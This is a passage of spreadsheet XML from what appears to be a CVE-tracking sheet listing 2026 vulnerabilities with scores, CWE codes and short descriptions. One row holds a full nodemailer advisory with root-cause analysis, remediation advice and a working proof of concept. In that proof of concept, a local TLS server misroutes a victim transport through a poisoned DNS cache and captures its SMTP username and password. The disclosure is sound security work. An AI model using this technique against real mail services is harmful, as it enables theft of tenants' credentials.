        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in agentverus agentverus-scanner up to 0.8.1. Affected by this vulnerability is the function isSecurityDefenseSkill of the file dist/scanner/analyzers/context.js. Performing a manipulation results in reliance on untrusted inputs in a security decision. The attack must be initiated from a local position. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101079</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102241</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-320, CWE-321</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Netcore NAP930 0.1.241010.141410. This vulnerability affects unknown code of the file /lib/functions/backup_common.sh of the component Backup/Restore. This manipulation of the argument aes_pass causes use of hard-coded cryptographic key
 . It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102241</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101071</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Acrel Electric Unet Web Service up to 20260814. This vulnerability affects unknown code of the file /exchange/attachment/upload of the component Upload Endpoint. This manipulation of the argument File causes unrestricted upload. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101071</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101010</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in aaPanel BaoTa up to 11.8.0. The impacted element is the function getData of the file /www/server/panel/class/data.py. The manipulation of the argument log_type leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101010</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101011</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in aaPanel BaoTa up to 11.8.0. This affects the function get_domain_status of the file /www/server/panel/mod/project/domain/domainMod.py of the component Domain Handler. The manipulation of the argument get results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101011</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101139</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Webkul Bagisto up to 2.4.6. This impacts an unknown function of the file /admin/sales/invoices/mass-update/state of the component Invoice Mass Status Update. Performing a manipulation results in missing authorization. The attack can be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101139</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101036</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in FLB-Music FLB-Music-Player 1.1.8/1.1.9/1.2.0/1.2.1. This impacts the function path.join of the file /src/main/core/createParsedTrack.ts. The manipulation leads to path traversal. The attack must be carried out locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101036</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101078</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-653</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in deepseek-ai deepseek-harness up to 0.1.7-rc.2. Affected is an unknown function of the file packages/sandbox/sandbox-local/src/profiles.ts of the component Landlock Backend. Such manipulation leads to improper isolation or compartmentalization. The attack must be carried out locally. The exploit has been disclosed to the public and may be used. It is advisable to implement a patch to correct this issue. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101078</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101080</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>0.9</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Tencent AI-Infra-Guard up to 4.5.2/4.6.2. This affects the function startsWith of the file skill_scan/tools/dir/dir_actions.py of the component File Access. The manipulation leads to path traversal. The attack needs to be performed locally. The exploit is publicly available and might be used. Upgrading to version 4.6.0 is able to mitigate this issue. The identifier of the patch is ac0384edc9dbea3b226edefcf50613bd8509134f. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101080</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100701</t>
        </is>
      </c>
      <c r="D314" s="5" t="inlineStr"/>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M314" s="5" t="inlineStr">
        <is>
          <t>10.0.2</t>
        </is>
      </c>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr"/>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>### Summary
Nodemailer's process-global DNS cache is keyed only by `host`, but each cache entry also stores the caller-specific TLS `servername`. When two direct SMTPS transports use the same DNS host with different `tls.servername` values, the first transport's server name is returned to the second transport and overwrites its explicitly configured value.
As a result, Nodemailer sends the wrong SNI value and verifies the peer certificate against the wrong identity. In a multi-tenant service or SNI-routed SMTP gateway, one tenant can prime the cache so that a victim transport connects to the attacker's TLS virtual host, accepts the attacker's certificate with `rejectUnauthorized: true`, and sends the victim's SMTP credentials to it.
## Affected component
- **Ecosystem:** npm
- **Package:** `nodemailer`
- **Repository:** https://github.com/nodemailer/nodemailer
- **Tested version:** `10.0.1`
- **Tested commit:** `40d52215aac65b811d7e131bc916f68605efd9d2`
- **Runtime-confirmed vulnerable versions:** `5.0.0` and `10.0.1`
- **Affected versions:** `&gt;= 5.0.0, &lt;= 10.0.1`
- **Patched versions:** None known at the time of this report
- **Affected mode:** Direct TLS/SMTPS connections (`secure: true`) where different transports use the same non-IP `host` and different TLS `servername` values
The vulnerable cache implementation was introduced in commit `6859b5dd96c8d9f0070a3169a877181b71df4a3b` on 2018-12-28. Git history shows `v5.0.0` as the first release tag containing that commit. The behavior remains present in `v10.0.1`.
## Details
### Root cause
`src/shared/index.ts` defines one module-global DNS cache, keyed only by the DNS host:
```ts
export const dnsCache = new Map&lt;string, DnsCacheEntry&gt;();
```
Although the cache key contains only `host`, the cached value contains both DNS addresses and the request-specific TLS identity:
```ts
const value: DnsCacheValue = {
    addresses: allAddresses,
    servername: options.servername || host
};
dnsCache.set(host, {
    value,
    expires: Date.now() + (options.dnsTtl || DNS_TTL)
});
```
On a cache hit, `resolveHostname()` returns the cached `servername` without considering the current call's `options.servername`:
```ts
if (!cached.expires || cached.expires &gt;= now) {
    return callback(
        null,
        formatDNSValue(cached.value, {
            cached: true
        })
    );
}
```
`formatDNSValue()` copies that stale value into the result:
```ts
return Object.assign(
    {
        servername: value.servername,
        host,
        _addresses: addresses
    },
    extra || {}
);
```
For a direct TLS connection, `SMTPConnection.connect()` initially copies the current transport's TLS configuration into `opts`. `_resolveAndConnect()` then overwrites every truthy field with the cached resolver result, including `opts.servername`:
```ts
Object.assign(opts, this.options.tls || {});
if (this.servername &amp;&amp; !opts.servername) {
    opts.servername = this.servername;
}
return this._resolveAndConnect(opts, resolved =&gt; {
    this._connectToHost(opts, this.secureConnection);
});
```
```ts
for (const key of Object.keys(resolved!)) {
    if (key.charAt(0) !== '_' &amp;&amp; (resolved as { [key: string]: any })[key]) {
        (opts as { [key: string]: any })[key] = (resolved as { [key: string]: any })[key];
    }
}
```
The resulting `opts` object is passed to `tls.connect()`. Node therefore sends the cached server name as SNI and verifies the certificate against that cached name, rather than against the server name explicitly configured for the current transport.
The default DNS cache TTL is five minutes:
```ts
const DNS_TTL = 5 * 60 * 1000;
```
### Code path
```text
Tenant A: createTransport({ host: H, secure: true,
                            tls: { servername: attackerName } })
  -&gt; SMTPConnection.connect()
  -&gt; _resolveAndConnect(opts)
  -&gt; shared.resolveHostname({ host: H, servername: attackerName })
  -&gt; dnsCache.set(H, { addresses, servername: attackerName })
Victim: createTransport({ host: H, secure: true,
                          tls: { servername: victimName } })
  -&gt; SMTPConnection.connect()
  -&gt; opts.servername = victimName
  -&gt; _resolveAndConnect(opts)
  -&gt; shared.resolveHostname({ host: H, servername: victimName })
  -&gt; dnsCache.get(H)
  -&gt; returns cached servername = attackerName
  -&gt; _resolveAndConnect overwrites opts.servername
  -&gt; tls.connect({ servername: attackerName })
  -&gt; attacker SNI virtual host and certificate are selected
  -&gt; AUTH transmits victim SMTP credentials
```
### Relevant source locations in the tested revision
- `src/shared/index.ts:184` — five-minute default cache TTL
- `src/shared/index.ts:245` — process-global cache keyed by host
- `src/shared/index.ts:247-262` — cached `servername` returned by `formatDNSValue()`
- `src/shared/index.ts:292-323` — host-only lookup and cache-hit return
- `src/shared/index.ts:350-359` — caller-specific `servername` stored in host-only cache
- `src/smtp-connection/index.ts:713-729` — direct TLS options and resolver call
- `src/smtp-connection/index.ts:741-763` — cached fields overwrite current connection options
## PoC
### Prerequisites
- Node.js 20 (tested with Node.js `20.20.2`)
- A checkout/build of Nodemailer `10.0.1`
- OpenSSL to generate the local test certificate
No external SMTP server or network access is required.
### 1. Generate a certificate for only `attacker.test`
Create `openssl.cnf`:
```ini
[req]
distinguished_name = dn
x509_extensions = ext
prompt = no
[dn]
CN = attacker.test
[ext]
subjectAltName = DNS:attacker.test
basicConstraints = critical,CA:TRUE
keyUsage = critical,digitalSignature,keyEncipherment,keyCertSign
extendedKeyUsage = serverAuth
```
Generate the certificate and private key:
```bash
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout attacker-key.pem -out attacker-cert.pem -config openssl.cnf
```
### 2. Save the following as `poc-dns-cache-servername-confusion.mjs`
Adjust the two import paths if the PoC is not saved beside the repository checkout.
```js
import fs from 'node:fs';
import tls from 'node:tls';
import nodemailer from '../../nodemailer/dist/esm/nodemailer.js';
import * as shared from '../../nodemailer/dist/esm/shared/index.js';
const cert = fs.readFileSync(new URL('./tls-fixture/attacker-cert.pem', import.meta.url));
const key = fs.readFileSync(new URL('./tls-fixture/attacker-key.pem', import.meta.url));
const observedSni = [];
const observedAuth = [];
const server = tls.createServer({ key, cert }, socket =&gt; {
    observedSni.push(socket.servername);
    socket.write('220 attacker.test ESMTP\r\n');
    let input = '';
    socket.on('data', chunk =&gt; {
        input += chunk.toString();
        let end;
        while ((end = input.indexOf('\r\n')) &gt;= 0) {
            const line = input.slice(0, end);
            input = input.slice(end + 2);
            if (/^EHLO /i.test(line)) {
                socket.write('250-attacker.test\r\n250 AUTH PLAIN\r\n');
            } else if (/^AUTH /i.test(line)) {
                observedAuth.push(line);
                socket.write('235 2.7.0 Authentication successful\r\n');
            } else if (/^QUIT/i.test(line)) {
                socket.end('221 Bye\r\n');
            } else {
                socket.write('250 OK\r\n');
            }
        }
    });
});
await new Promise(resolve =&gt; server.listen(0, '127.0.0.1', resolve));
try {
    shared.dnsCache.clear();
    // Tenant A seeds the process-global cache for the shared DNS host.
    const attackerTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'attacker@example.test', pass: 'attacker-secret' },
        tls: {
            ca: cert,
            servername: 'attacker.test',
            rejectUnauthorized: true
        }
    });
    await attackerTransport.verify();
    attackerTransport.close();
    // The victim explicitly configures a different TLS identity.
    const victimTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'victim@example.test', pass: 'victim-secret' },
        tls: {
            ca: cert,
            servername: 'victim.test',
            rejectUnauthorized: true
        }
    });
    await victimTransport.verify();
    victimTransport.close();
    const decoded = observedAuth.map(line =&gt;
        line.startsWith('AUTH PLAIN ')
            ? Buffer.from(line.slice('AUTH PLAIN '.length), 'base64').toString()
            : null
    );
    console.log(JSON.stringify({
        attackerConfiguredServername: 'attacker.test',
        victimConfiguredServername: 'victim.test',
        serverObservedSniForBothConnections: observedSni,
        serverReceivedCredentials: decoded
    }, null, 2));
} finally {
    shared.dnsCache.clear();
    await new Promise(resolve =&gt; server.close(resolve));
}
```
### 3. Build and run
From the Nodemailer checkout:
```bash
npm install
npm run build
node ../audit/nodemailer/poc-dns-cache-servername-confusion.mjs
```
### Observed result
```json
{
  "attackerConfiguredServername": "attacker.test",
  "victimConfiguredServername": "victim.test",
  "serverObservedSniForBothConnections": [
    "attacker.test",
    "attacker.test"
  ],
  "serverReceivedCredentials": [
    "\\u0000attacker@example.test\\u0000attacker-secret",
    "\\u0000victim@example.test\\u0000victim-secret"
  ]
}
```
The victim configured `victim.test`, but the server observes `attacker.test` for both handshakes. The local certificate contains only `attacker.test`, yet the victim connection succeeds with `rejectUnauthorized: true` and then sends the victim's username and password.
### Expected result
The second connection must use `victim.test` for SNI and certificate hostname verification. With the PoC certificate, it should fail with a hostname mismatch before SMTP authentication occurs. It must never transmit victim credentials after validating the peer as `attacker.test`.
## Impact
The vulnerability affects long-running applications that create multiple Nodemailer transports in one process and let separate tenants or security domains configure transports that share a DNS `host`. A practical example is an email platform whose SMTP gateway uses SNI to route several customer-specific SMTP endpoints behind one hostname.
An attacker who can create or exercise one transport can prime the global cache with the shared host and the attacker's `tls.servername`. During the cache lifetime, a victim's direct SMTPS connection to that host can:
1. send the attacker's server name as SNI;
2. be routed to the attacker's TLS virtual host;
3. validate the attacker's certificate against the stale name, even though strict certificate validation is enabled; and
4. transmit the victim's SMTP username and password to that endpoint.
Possession of SMTP credentials may also let the attacker read or change mail account state where the provider reuses those credentials, or send mail as the victim. The exact secondary impact depends on the SMTP provider.
Where the attacker cannot control an SNI virtual host, stale cross-transport SNI can still cause certificate mismatch failures and cross-tenant availability impact.
### Preconditions and limitations
- Two transports must execute in the same Node.js process within the cache lifetime.
- They must use the same non-IP `host` cache key and different `tls.servername` values.
- Credential interception requires an endpoint or gateway that routes connections using SNI, or another deployment where the attacker controls the endpoint selected by the stale name.
- The demonstrated path uses direct SMTPS (`secure: true`). The STARTTLS upgrade path constructs TLS options separately and is not claimed vulnerable by this report.
## Suggested remediation
The DNS cache should store DNS data only. `servername` is connection-specific TLS policy and should not be persisted in a cache keyed solely by hostname.
One approach is to remove `servername` from `DnsCacheValue` and derive the returned value from the current request on every path:
```ts
return {
    host: selectedAddress,
    servername: options.servername || options.host || false,
    _addresses: addresses,
    cached: true
};
```
As defense in depth, `_resolveAndConnect()` should not overwrite an explicitly configured `opts.servername` with resolver metadata. Keying the cache by both host and server name would avoid this particular collision, but keeping TLS identity out of a DNS-address cache provides a cleaner separation.
A regression test should create two direct-TLS transports in the same process with the same DNS host and different explicit server names, then assert that each TLS connection observes and verifies its own configured name regardless of cache order.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100701</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101062</t>
        </is>
      </c>
      <c r="D315" s="5" t="inlineStr"/>
      <c r="E315" s="5" t="inlineStr"/>
      <c r="F315" s="5" t="inlineStr"/>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M315" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr"/>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>Obot: OAuth Dynamic Client Registration Enables API Token Theft via Audience Confusion in github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101062</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101895</t>
        </is>
      </c>
      <c r="D316" s="5" t="inlineStr"/>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M316" s="5" t="inlineStr">
        <is>
